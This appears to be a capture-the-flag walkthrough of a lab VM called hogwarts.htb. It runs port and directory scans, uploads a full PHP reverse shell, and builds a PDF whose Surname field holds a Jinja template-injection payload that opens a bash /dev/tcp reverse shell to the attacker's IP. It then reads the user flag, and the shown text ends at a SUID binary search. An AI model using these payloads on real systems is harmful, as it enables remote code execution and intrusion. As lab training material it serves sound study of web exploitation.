1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# arp-scan -l | grep 08:00:27
3

4
192.168.0.106   08:00:27:d2:ba:97       PCS Systemtechnik GmbH

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# arp-scan -l | grep 08:00:27
3

4
192.168.0.106   08:00:27:d2:ba:97       PCS Systemtechnik GmbH
5

6
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
7
└─# rustscan -a 192.168.0.106 -- -A
8
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
9
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
10
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
11
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
12
The Modern Day Port Scanner.
13
________________________________________
14
: http://discord.skerritt.blog         :
15
: https://github.com/RustScan/RustScan :
16
 --------------------------------------
17
Port scanning: Making networking exciting since... whenever.
18

19
[~] The config file is expected to be at "/root/.rustscan.toml"
20
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
21
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
22
Open 192.168.0.106:22
23
Open 192.168.0.106:53
24
Open 192.168.0.106:80
25
[~] Starting Script(s)
26
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.0.106
27
Depending on the complexity of the script, results may take some time to appear.
28
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-24 09:30 EST
29
Discovered open port 22/tcp on 192.168.0.106
30
Discovered open port 80/tcp on 192.168.0.106
31

32
PORT   STATE  SERVICE REASON         VERSION
33
22/tcp open   ssh     syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
34
| ssh-hostkey:
35
|   3072 0c:c6:d6:24:1e:5b:9e:66:25:0a:ba:0a:08:0b:18:40 (RSA)
36
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCihzhvruzjUnXRfyh685PiUN5ItFZ/V0IHymFDih4nSIcKYrhMIw06oKdfeT3zo4tP14xB3ZrjnI3sEFh9R8LV34dTNhH4cNUtbS/f0h2inMM35dJc533bNxJtT/znohcEjYgUP3PSCK3dOuP+CcMrW8z+0QJJE9gbw9DqC5hlCzZwBHJgMvNhP74hBD/JayHiS8G+K2G4owfXRHBs3LhEXYpHEibAHS/E1G1j9R2wzTLKoN5Y0JKQ+bLxGbJekcnSl2o6hlAarOQnX1I3G+EFgWexJn/xABxqEWk9B6NLhhPozoTyi43Xc/omUF6Cw9jFl2v4z7bABMVVPjlXH748C6tFeRzx6/mqAv2Ok2+Hzf1iessMzvYs1hnZBqL51gwcmBmMoSovm68d2jEKUwVQxEIsFH5lFGQciyM0rfn6EcA0up6iomAhs2fTA8MsOG6WJWd1Sw2nCTNygrmQ8tZfVGYz8rVaH8MkUENct8IxGN1iqel+9Cmdka9DDb+BMVM=
37
|   256 9c:c3:1d:ea:22:04:93:b7:81:dd:f2:96:5d:f0:1f:9b (ECDSA)
38
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFAZBwooUDLqSK+kKOx+YVnScFejnY3t0q+D4qt3jCOsjP4dJ8Wf9ORNUbHa7CtlrK3WlqluzuRQsXJ10tvyTw8=
39
|   256 55:41:15:90:ff:1d:53:88:e7:65:91:4f:fd:cf:49:85 (ED25519)
40
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGM6WqG9CguoVafo9uhRSPqtZG9yR57PD70/FKDqba9e
41
53/tcp closed domain  reset ttl 64
42
80/tcp open   http    syn-ack ttl 64 Werkzeug/3.0.4 Python/3.8.10
43
| http-methods:
44
|_  Supported Methods: GET HEAD POST OPTIONS
45
|_http-title: Did not follow redirect to http://hogwarts.htb
46
|_http-server-header: Werkzeug/3.0.4 Python/3.8.10
47
| fingerprint-strings:
48
|   GetRequest, HTTPOptions:
49
|     HTTP/1.1 302 FOUND
50
|     Server: Werkzeug/3.0.4 Python/3.8.10
51
|     Date: Sat, 24 Jan 2026 14:30:23 GMT
52
|     Content-Type: text/html; charset=utf-8
53
|     Content-Length: 225
54
|     Location: http://hogwarts.htb
55
|     Connection: close
56
|     <!doctype html>
57
|     <html lang=en>
58
|     <title>Redirecting...</title>
59
|     <h1>Redirecting...</h1>
60
|     <p>You should be redirected automatically to the target URL: <a href="http://hogwarts.htb">http://hogwarts.htb</a>. If not, click the link.
61
|   RTSPRequest:
62
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
63
|     "http://www.w3.org/TR/html4/strict.dtd">
64
|     <html>
65
|     <head>
66
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
67
|     <title>Error response</title>
68
|     </head>
69
|     <body>
70
|     <h1>Error response</h1>
71
|     <p>Error code: 400</p>
72
|     <p>Message: Bad request version ('RTSP/1.0').</p>
73
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
74
|     </body>
75
|_    </html>
76
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
77
SF-Port80-TCP:V=7.94SVN%I=7%D=1/24%Time=6974D778%P=x86_64-pc-linux-gnu%r(G
78
SF:etRequest,1B1,"HTTP/1\.1\x20302\x20FOUND\r\nServer:\x20Werkzeug/3\.0\.4
79
SF:\x20Python/3\.8\.10\r\nDate:\x20Sat,\x2024\x20Jan\x202026\x2014:30:23\x
80
SF:20GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length
81
SF::\x20225\r\nLocation:\x20http://hogwarts\.htb\r\nConnection:\x20close\r
82
SF:\n\r\n<!doctype\x20html>\n<html\x20lang=en>\n<title>Redirecting\.\.\.</
83
SF:title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\x20should\x20be\x20redirecte
84
SF:d\x20automatically\x20to\x20the\x20target\x20URL:\x20<a\x20href=\"http:
85
SF://hogwarts\.htb\">http://hogwarts\.htb</a>\.\x20If\x20not,\x20click\x20
86
SF:the\x20link\.\n")%r(HTTPOptions,1B1,"HTTP/1\.1\x20302\x20FOUND\r\nServe
87
SF:r:\x20Werkzeug/3\.0\.4\x20Python/3\.8\.10\r\nDate:\x20Sat,\x2024\x20Jan
88
SF:\x202026\x2014:30:23\x20GMT\r\nContent-Type:\x20text/html;\x20charset=u
89
SF:tf-8\r\nContent-Length:\x20225\r\nLocation:\x20http://hogwarts\.htb\r\n
90
SF:Connection:\x20close\r\n\r\n<!doctype\x20html>\n<html\x20lang=en>\n<tit
91
SF:le>Redirecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\x20sho
92
SF:uld\x20be\x20redirected\x20automatically\x20to\x20the\x20target\x20URL:
93
SF:\x20<a\x20href=\"http://hogwarts\.htb\">http://hogwarts\.htb</a>\.\x20I
94
SF:f\x20not,\x20click\x20the\x20link\.\n")%r(RTSPRequest,1F4,"<!DOCTYPE\x2
95
SF:0HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x
96
SF:20\x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>
97
SF:\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http
98
SF:-equiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x
99
SF:20\x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x2
100
SF:0\x20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<
101
SF:h1>Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20
102
SF:code:\x20400</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Bad\x2
103
SF:0request\x20version\x20\('RTSP/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\
104
SF:x20\x20<p>Error\x20code\x20explanation:\x20HTTPStatus\.BAD_REQUEST\x20-
105
SF:\x20Bad\x20request\x20syntax\x20or\x20unsupported\x20method\.</p>\n\x20
106
SF:\x20\x20\x20</body>\n</html>\n");
107
MAC Address: 08:00:27:D2:BA:97 (Oracle VirtualBox virtual NIC)
108
Device type: general purpose
109
Running: Linux 4.X|5.X
110
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
111
OS details: Linux 4.15 - 5.8
112
TCP/IP fingerprint:
113
OS:SCAN(V=7.94SVN%E=4%D=1/24%OT=22%CT=53%CU=34755%PV=Y%DS=1%DC=D%G=Y%M=0800
114
OS:27%TM=6974D7CA%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=107%TI=Z%CI=Z%
115
OS:II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11N
116
OS:W7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE8
117
OS:8%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40
118
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
119
OS:%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%
120
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
121
OS:)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%
122
OS:DFI=N%T=40%CD=S)
123

124
Uptime guess: 40.160 days (since Mon Dec 15 05:40:37 2025)
125
Network Distance: 1 hop
126
TCP Sequence Prediction: Difficulty=263 (Good luck!)
127
IP ID Sequence Generation: All zeros
128
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
129

130
TRACEROUTE
131
HOP RTT     ADDRESS
132
1   0.35 ms tmpfile.dsz (192.168.0.106)
133

134
NSE: Script Post-scanning.
135
NSE: Starting runlevel 1 (of 3) scan.
136
Initiating NSE at 09:31
137
Completed NSE at 09:31, 0.00s elapsed
138
NSE: Starting runlevel 2 (of 3) scan.
139
Initiating NSE at 09:31
140
Completed NSE at 09:31, 0.00s elapsed
141
NSE: Starting runlevel 3 (of 3) scan.
142
Initiating NSE at 09:31
143
Completed NSE at 09:31, 0.00s elapsed
144
Read data files from: /usr/share/nmap
145
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
146
Nmap done: 1 IP address (1 host up) scanned in 89.07 seconds
147
           Raw packets sent: 26 (1.938KB) | Rcvd: 18 (1.406KB)

1
echo "192.168.0.106 hogwarts.htb" >> /etc/hosts

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# gobuster dir -u hogwarts.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64
3
===============================================================
4
Gobuster v3.6
5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6
===============================================================
7
[+] Url:                     http://192.168.0.106
8
[+] Method:                  GET
9
[+] Threads:                 64
10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
11
[+] Negative Status codes:   404
12
[+] User Agent:              gobuster/3.6
13
[+] Extensions:              txt,html,zip,db,bak,js,yaml,php
14
[+] Timeout:                 10s
15
===============================================================
16
Starting gobuster in directory enumeration mode
17
===============================================================
18

19
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.0.106/e304c45d-9ed9-4981-b561-cf8b58e733b0 => 302 (Length: 225). To continue please exclude the status code or the length

1
欢迎来到霍格沃茨魔法学校
2
霍格沃茨魔法学校是世界上最负盛名的魔法学府之一，创建于一千多年前，由当时最伟大的四位巫师和女巫共同创立：戈德里克·格兰芬多、赫尔加·赫奇帕奇、罗伊娜·拉文克劳以及萨拉查·斯莱特林。学校坐落于苏格兰高地，这里不仅是一所学校，更是年轻巫师们学习、成长并掌控自身魔法能力的圣地。在强大魔法的保护下，霍格沃茨对麻瓜世界隐匿无踪，如同一座象征着魔法知识与冒险的灯塔。
3

4
在霍格沃茨，新生会被分入四大学院之一：
5
格兰芬多：以勇气与胆识著称
6
赫奇帕奇：代表忠诚与勤奋
7
拉文克劳：象征智慧与创造力
8
斯莱特林：崇尚野心与谋略
9

10
分院帽是一件被四位创始人赋予智慧的魔法物品，它会根据学生的性格与潜力决定最适合他们的学院。
11

12
认识我们的部分教授
13
阿不思·邓布利多教授 —— 校长
14
邓布利多不仅是霍格沃茨的校长，也是魔法史上最强大、最受尊敬的巫师之一。他以智慧、仁慈以及对魔法界与麻瓜世界的坚定守护而闻名。1945 年击败黑巫师格林德沃的壮举，以及对魔法研究的巨大贡献（包括发现龙血的十二种用途），使他名留青史。
15

16
米勒娃·麦格教授 —— 变形术
17
作为副校长兼格兰芬多学院院长，麦格教授治学严谨、公正严肃，深受学生敬重。她教授变形术——魔法中最困难的分支之一，内容包括改变物体或生物的形态。在她的指导下，学生们学会将动物变成物品，把茶杯变成老鼠，最终掌握人体变形术。
18

19
莱姆斯·卢平教授 —— 黑魔法防御术
20
卢平教授是霍格沃茨历史上最受欢迎的教师之一。他以富有同情心且高超的教学方式教授黑魔法防御术，学生们在课堂上学习如何对抗博格特、摄魂怪、狼人等黑暗生物，以及抵御黑魔法与诅咒。这门课程至关重要，为学生面对魔法世界中的黑暗势力做好准备。
21

22
西弗勒斯·斯内普教授 —— 魔药学
23
斯内普教授是斯莱特林学院院长，也是霍格沃茨最复杂、最神秘的人物之一。他在魔药学方面造诣极高，学生们在他的课堂上学习从基础解药到危险而复杂的魔药调制。
24

25
你将在霍格沃茨学到的课程
26
变形术：改变物体或生命形态的艺术
27
魔咒学：为物体或生物赋予特殊属性的咒语
28
魔药学：研究具有多种效果的魔法药剂
29
草药学：研究魔法植物与菌类
30
黑魔法防御术：防御黑暗生物、诅咒与黑魔法
31
天文学：研究星辰、行星及其魔法影响
32
魔法史：回顾魔法世界从远古到现代的历史
33
占卜学：预测未来的神秘艺术
34
神奇生物保护课：学习照料、驯养和喂养魔法生物
35

36
申请加入霍格沃茨
37
请以 PDF 格式提交你的申请材料。
38
👉 请使用我们提供的模板。

1
<form action="/upload" method="POST" enctype="multipart/form-data">
2
    <input type="file" name="pdf_file" required>
3
    <input type="submit" value="Submit">
4
</form>

1
POST /upload HTTP/1.1
2

3
Host: hogwarts.htb
4

5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
6

7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
8

9
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
10

11
Accept-Encoding: gzip, deflate, br
12

13
Content-Type: multipart/form-data; boundary=---------------------------9505286192044214114097786600
14

15
Content-Length: 9517
16

17
Origin: http://hogwarts.htb
18

19
Connection: keep-alive
20

21
Referer: http://hogwarts.htb/
22

23
Upgrade-Insecure-Requests: 1
24

25
Priority: u=0, i
26

27

28

29
-----------------------------9505286192044214114097786600
30

31
Content-Disposition: form-data; name="pdf_file"; filename="shell.php"
32

33
Content-Type: application/x-php
34

35

36

37
<?php
38
// Copyright (c) 2020 Ivan Sincek
39
// v2.3
40
// Requires PHP v5.0.0 or greater.
41
// Works on Linux OS, macOS, and Windows OS.
42
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
43
class Shell {
44
    private $addr  = null;
45
    private $port  = null;
46
    private $os    = null;
47
    private $shell = null;
48
    private $descriptorspec = array(
49
        0 => array('pipe', 'r'), // shell can read from STDIN
50
        1 => array('pipe', 'w'), // shell can write to STDOUT
51
        2 => array('pipe', 'w')  // shell can write to STDERR
52
    );
53
    private $buffer  = 1024;    // read/write buffer size
54
    private $clen    = 0;       // command length
55
    private $error   = false;   // stream read/write error
56
    public function __construct($addr, $port) {
57
        $this->addr = $addr;
58
        $this->port = $port;
59
    }
60
    private function detect() {
61
        $detected = true;
62
        if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS
63
            $this->os    = 'LINUX';
64
            $this->shell = 'bash';
65
        } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) {
66
            $this->os    = 'WINDOWS';
67
            $this->shell = 'cmd.exe';
68
        } else {
69
            $detected = false;
70
            echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
71
        }
72
        return $detected;
73
    }
74
    private function daemonize() {
75
        $exit = false;
76
        if (!function_exists('pcntl_fork')) {
77
            echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
78
        } else if (($pid = @pcntl_fork()) < 0) {
79
            echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
80
        } else if ($pid > 0) {
81
            $exit = true;
82
            echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
83
        } else if (posix_setsid() < 0) {
84
            // once daemonized you will actually no longer see the script's dump
85
            echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
86
        } else {
87
            echo "DAEMONIZE: Completed successfully!\n";
88
        }
89
        return $exit;
90
    }
91
    private function settings() {
92
        @error_reporting(0);
93
        @set_time_limit(0); // do not impose the script execution time limit
94
        @umask(0); // set the file/directory permissions - 666 for files and 777 for directories
95
    }
96
    private function dump($data) {
97
        $data = str_replace('<', '&lt;', $data);
98
        $data = str_replace('>', '&gt;', $data);
99
        echo $data;
100
    }
101
    private function read($stream, $name, $buffer) {
102
        if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
103
            $this->error = true;                            // set global error flag
104
            echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n";
105
        }
106
        return $data;
107
    }
108
    private function write($stream, $name, $data) {
109
        if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
110
            $this->error = true;                            // set global error flag
111
            echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n";
112
        }
113
        return $bytes;
114
    }
115
    // read/write method for non-blocking streams
116
    private function rw($input, $output, $iname, $oname) {
117
        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
118
            if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
119
            $this->dump($data); // script's dump
120
        }
121
    }
122
    // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
123
    // we must read the exact byte length from a stream and not a single byte more
124
    private function brw($input, $output, $iname, $oname) {
125
        $fstat = fstat($input);
126
        $size = $fstat['size'];
127
        if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {
128
            // for some reason Windows OS pipes STDIN into STDOUT
129
            // we do not like that
130
            // we need to discard the data from the stream
131
            while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
132
                $this->clen -= $bytes;
133
                $size -= $bytes;
134
            }
135
        }
136
        while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
137
            $size -= $bytes;
138
            $this->dump($data); // script's dump
139
        }
140
    }
141
    public function run() {
142
        if ($this->detect() && !$this->daemonize()) {
143
            $this->settings();
144

145
            // ----- SOCKET BEGIN -----
146
            $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
147
            if (!$socket) {
148
                echo "SOC_ERROR: {$errno}: {$errstr}\n";
149
            } else {
150
                stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS
151

152
                // ----- SHELL BEGIN -----
153
                $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
154
                if (!$process) {
155
                    echo "PROC_ERROR: Cannot start the shell\n";
156
                } else {
157
                    foreach ($pipes as $pipe) {
158
                        stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS
159
                    }
160

161
                    // ----- WORK BEGIN -----
162
                    $status = proc_get_status($process);
163
                    @fwrite($socket, "SOCKET: Shell has connected! PID: " . $status['pid'] . "\n");
164
                    do {
165
            $status = proc_get_status($process);
166
                        if (feof($socket)) { // check for end-of-file on SOCKET
167
                            echo "SOC_ERROR: Shell connection has been terminated\n"; break;
168
                        } else if (feof($pipes[1]) || !$status['running']) {                 // check for end-of-file on STDOUT or if process is still running
169
                            echo "PROC_ERROR: Shell process has been terminated\n";   break; // feof() does not work with blocking streams
170
                        }                                                                    // use proc_get_status() instead
171
                        $streams = array(
172
                            'read'   => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
173
                            'write'  => null,
174
                            'except' => null
175
                        );
176
                        $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); // wait for stream changes | will not wait on Windows OS
177
                        if ($num_changed_streams === false) {
178
                            echo "STRM_ERROR: stream_select() failed\n"; break;
179
                        } else if ($num_changed_streams > 0) {
180
                            if ($this->os === 'LINUX') {
181
                                if (in_array($socket  , $streams['read'])) { $this->rw($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
182
                                if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
183
                                if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
184
                            } else if ($this->os === 'WINDOWS') {
185
                                // order is important
186
                                if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
187
                                if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
188
                                if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
189
                            }
190
                        }
191
                    } while (!$this->error);
192
                    // ------ WORK END ------
193

194
                    foreach ($pipes as $pipe) {
195
                        fclose($pipe);
196
                    }
197
                    proc_close($process);
198
                }
199
                // ------ SHELL END ------
200

201
                fclose($socket);
202
            }
203
            // ------ SOCKET END ------
204

205
        }
206
    }
207
}
208
echo '<pre>';
209
// change the host address and/or port number as necessary
210
$sh = new Shell('192.168.0.108', 4444);
211
$sh->run();
212
unset($sh);
213
// garbage collector requires PHP v5.3.0 or greater
214
// @gc_collect_cycles();
215
echo '</pre>';
216
?>
217

218

219
-----------------------------9505286192044214114097786600--

1
HTTP/1.1 500 INTERNAL SERVER ERROR
2

3
Server: Werkzeug/3.0.4 Python/3.8.10
4

5
Date: Sat, 24 Jan 2026 14:50:12 GMT
6

7
Content-Type: text/html; charset=utf-8
8

9
Content-Length: 265
10

11
Connection: close
12

13

14

15
<!doctype html>
16
<html lang=en>
17
<title>500 Internal Server Error</title>
18
<h1>Internal Server Error</h1>
19
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>

1
POST /upload HTTP/1.1
2

3
Host: hogwarts.htb
4

5
User-Agent: Mozilla/5.0
6

7
Accept: */*
8

9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123
10

11
Content-Length: 286
12

13

14

15
------WebKitFormBoundaryABC123
16

17
Content-Disposition: form-data; name="pdf_file"; filename="test.pdf"
18

19
Content-Type: application/pdf
20

21

22

23
%PDF-1.4
24

25
1 0 obj
26

27
<< /Type /Catalog >>
28

29
endobj
30

31
xref
32

33
0 1
34

35
0000000000 65535 f
36

37
trailer
38

39
<< /Root 1 0 R >>
40

41
%%EOF
42

43

44

45
------WebKitFormBoundaryABC123--

1
HTTP/1.1 200 OK
2

3
Server: Werkzeug/3.0.4 Python/3.8.10
4

5
Date: Sat, 24 Jan 2026 14:52:12 GMT
6

7
Content-Type: text/html; charset=utf-8
8

9
Content-Length: 1644
10

11
Connection: close
12

13

14

15

16
        <!DOCTYPE html>
17
        <html lang="en">
18
            <head>
19
                <meta charset="UTF-8">
20
                <meta name="viewport" content="width=device-width, initial-scale=1.0">
21
                <title>Confirmation</title>
22
                <link rel="stylesheet" href="/static/style.css">
23

24
                <link rel="apple-touch-icon" sizes="180x180" href="/static/favicon/apple-touch-icon.png">
25
                <link rel="icon" type="image/png" sizes="32x32" href="/static/favicon/favicon-32x32.png">
26
                <link rel="icon" type="image/png" sizes="16x16" href="/static/favicon/favicon-16x16.png">
27
                <link rel="manifest" href="/static/favicon/site.webmanifest">
28
                <link rel="mask-icon" href="/static/favicon/safari-pinned-tab.svg" color="#5bbad5">
29
                <meta name="msapplication-TileColor" content="#da532c">
30
                <meta name="theme-color" content="#ffffff">
31
            </head>
32
            <body>
33
                <div class="content">
34
                    <h1>Application Received</h1>
35
                    <p>Thank you. Your application to Hogwarts has been successfully submitted with the following data:</p>
36
                    <p>
37
                        <ul>
38
                            <li>Name: </li>
39
                            <li>Surname: </li>
40
                            <li>Address: </li>
41
                            <li>Birthday: </li>
42
                            <li>Pet Breed: </li>
43
                            <li>Pet's Name: </li>
44
                        </ul>
45
                    </p>
46
                </div>
47
            </body>
48
        </html>

1
<li>Name: </li>
2
<li>Surname: </li>
3
<li>Address: </li>
4
<li>Birthday: </li>
5
<li>Pet Breed: </li>
6
<li>Pet's Name: </li>

1
from PyPDF2 import PdfReader
2

3
reader = PdfReader(uploaded_file)
4
text = reader.pages[0].extract_text()
5

6
name = extract("Name:", text)
7
surname = extract("Surname:", text)
8
...
9
return render_template("confirmation.html", **fields)

1
from reportlab.pdfgen import canvas
2
from reportlab.lib.pagesizes import letter
3

4
c = canvas.Canvas("malicious.pdf", pagesize=letter)
5
c.drawString(100, 700, "Name: Harry")
6
c.drawString(100, 680, "Surname: {{7*7}}")
7
c.drawString(100, 660, "Address: PrivetDrive")
8
c.drawString(100, 640, "Birthday: 31071980")
9
c.drawString(100, 620, "Pet Breed: Owl")
10
c.drawString(100, 600, "Pet's Name: Hedwig")
11
c.save()

1
from reportlab.pdfgen import canvas
2
from reportlab.lib.pagesizes import letter
3

4
c = canvas.Canvas("malicious.pdf", pagesize=letter)
5
c.drawString(100, 700, "Name: Harry")
6
c.drawString(100, 680, "Surname: {{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c \"bash -i >& /dev/tcp/192.168.0.108/4444 0>&1\"').read() }}")
7
c.drawString(100, 660, "Address: PrivetDrive")
8
c.drawString(100, 640, "Birthday: 31071980")
9
c.drawString(100, 620, "Pet Breed: Owl")
10
c.drawString(100, 600, "Pet's Name: Hedwig")
11
c.save()

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# pwncat-cs -lp 4444
3
/root/.pyenv/versions/3.11.9/envs/web/lib/python3.11/site-packages/zodburi/__init__.py:2: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
4
  from pkg_resources import iter_entry_points
5
[10:45:04] Welcome to pwncat 🐈!         __main__.py:164
6
[10:45:11] received connection from           bind.py:84
7
           192.168.0.106:50872
8
[10:45:13] 192.168.0.106:50872:           manager.py:957
9
           registered new host w/ db
10
(local) pwncat$ back
11
(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$

1
(remote) harry_potter@MagiFi:/home/harry_potter$ cat user.txt
2
hogwarts{ea4bc74f09fb69771165e57b1b215de9}

1
(remote) harry_potter@MagiFi:/$ find / -perm -4000 2>/dev/null
2
/usr/bin/gpasswd
3
/usr/bin/chfn
4
/usr/bin/umount
5
/usr/bin/newgrp
6
/usr/bin/xxd_horcrux
7
/usr/bin/su
8
/usr/bin/fusermount
9
/usr/bin/at
10
/usr/bin/pkexec
11
/usr/bin/sudo
12
/usr/bin/mount
13
/usr/bin/passwd
14
/usr/bin/chsh
15
/usr/lib/eject/dmcrypt-get-device
16
/usr/lib/openssh/ssh-keysign
17
/usr/lib/snapd/snap-confine
18
/usr/lib/policykit-1/polkit-agent-helper-1
19
/usr/lib/authbind/helper
20
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
21
/snap/snapd/23545/usr/lib/snapd/snap-confine
22
/snap/core20/2434/usr/bin/chfn
23
/snap/core20/2434/usr/bin/chsh
24
/snap/core20/2434/usr/bin/gpasswd
25
/snap/core20/2434/usr/bin/mount
26
/snap/core20/2434/usr/bin/newgrp
27
/snap/core20/2434/usr/bin/passwd
28
/snap/core20/2434/usr/bin/su
29
/snap/core20/2434/usr/bin/sudo
30
/snap/core20/2434/usr/bin/umount
31
/snap/core20/2434/usr/lib/dbus-1.0/dbus-daemon-launch-helper
32
/snap/core20/2434/usr/lib/openssh/ssh-keysign
33
/snap/core20/2686/usr/bin/chfn
34
/snap/core20/2686/usr/bin/chsh
35
/snap/core20/2686/usr/bin/gpasswd
36
/snap/core20/2686/usr/bin/mount
37
